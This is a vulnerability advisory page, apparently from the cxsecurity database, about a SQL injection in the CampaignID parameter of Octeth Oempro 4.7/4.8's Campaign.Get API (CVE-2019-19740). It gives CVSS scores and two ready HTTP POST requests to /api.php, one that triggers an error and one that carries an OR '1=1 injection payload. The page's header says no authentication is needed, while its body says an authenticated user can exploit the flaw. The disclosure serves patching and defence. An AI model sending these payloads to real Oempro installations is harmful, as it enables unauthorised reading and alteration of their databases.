Octeth Oempro 4.8 SQL Injection

2020.01.30
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection # Date: 2020-01-27 # Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br) # Vendor Homepage: www2.octeth.com # Version: Octeth Oempro v.4.7 and v.4.8 # Tested on: Oempro v.4.7 # CVE : CVE-2019-19740 An authenticated user can easily exploit this vulnerability. Octeth Oempro 4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get is vulnerable. # Error condition POST /api.php HTTP/1.1 Host: 127.0.0.1 command=Campaign.Get&CampaignID=2019'&responseformat=JSON # SQL Injection exploitation POST /api.php HTTP/1.1 Host: 127.0.0.1 command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top